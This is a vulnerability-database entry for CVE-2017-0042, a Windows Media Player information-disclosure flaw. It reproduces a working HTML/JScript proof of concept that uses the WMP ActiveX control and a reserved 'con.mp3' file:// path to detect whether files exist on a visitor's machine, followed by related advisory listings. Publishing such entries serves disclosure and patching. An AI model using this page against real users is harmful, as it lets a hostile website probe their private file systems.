Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:92844
HistoryMar 29, 2017 - 12:00 a.m.

Microsoft Windows DirectShow Information Disclosure Vulnerability(CVE-2017-0042)

2017-03-2900:00:00
Root
www.seebug.org
18

0.12 Low

EPSS

Percentile

94.8%

JSON

Windows Media Player in Microsoft Windows 8.1; Windows Server 2012 R2; Windows RT 8.1; Windows 7 SP1; Windows 2008 SP2 and R2 SP1, Windows Server 2016; Windows Vista SP2; and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information via a crafted web site, aka "Windows Media Player Information Disclosure Vulnerability.


                                                <!--
	Credit: @qab && @shhnjk
	Keep changing param.url to your desired file to detect. 
	This works on folders as well ( ex: file://C://Windows//con.mp3 )

	To see why we are using a reserved windows name 'con.*' remove it and try to 'detect' a file without it.
-->
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<PARAM NAME="URL" VALUE="file://C://Windows//win.ini//con.mp3">
<param name="captioningID" value="displaylyric" />
<PARAM NAME="autoStart" VALUE="-1">
</OBJECT>
<SCRIPT LANGUAGE = "JScript"  FOR = Player  EVENT = error()>

if(Player.error.item(0).errorDescription.length==189){
	alert('File not detected.');
}
else{
	alert('File detected!');
}
</SCRIPT>

Related

nessus 2
kaspersky 3
mscve 1
openvas 2
symantec 1
cve 1
prion 1
checkpoint_advisories 1
mskb 11
nessus
nessus
MS17-021: Security Update for Windows DirectShow (4010318)
2017-03-15 00:00:00
Windows Server 2012 April 2017 Security Updates (Petya)
2017-04-11 00:00:00
kaspersky
kaspersky
KLA10988 Information disclosure vulnerability in Windows DirectShow
2017-03-14 00:00:00
KLA10998 Information disclosure vulnerability in Microsoft Windows Media Player
2017-03-14 00:00:00
KLA11902 Multiple vulnerabilities in Microsoft Products (ESU)
2017-03-14 00:00:00
mscve
mscve
Windows DirectShow Information Disclosure Vulnerability
2017-03-14 07:00:00
openvas
openvas
Microsoft Windows DirectShow Information Disclosure Vulnerability (4010318)
2017-03-15 00:00:00
Microsoft Windows Monthly Rollup (KB4015551)
2017-04-12 00:00:00
symantec
symantec
Microsoft Windows DirectShow CVE-2017-0042 Information Disclosure Vulnerability
2017-03-14 00:00:00
cve
cve
CVE-2017-0042
2017-03-17 00:59:00
prion
prion
Information disclosure
2017-03-17 00:59:00
checkpoint_advisories
checkpoint_advisories
Microsoft Windows DirectShow Information Disclosure (MS17-021: CVE-2017-0042)
2017-03-14 00:00:00
mskb
mskb
Security update 2017-03-14
2017-03-14 07:00:00
MS17-021: Security update for Windows DirectShow: March 14, 2017
2017-03-14 00:00:00
April 11, 2017—KB4015548 (Security-only update)
2017-04-11 07:00:00

0.12 Low

EPSS

Percentile

94.8%

JSON
Related for SSV:92844
nessus2kaspersky3mscve1openvas2symantec1cve1prion1checkpoint_advisories1mskb11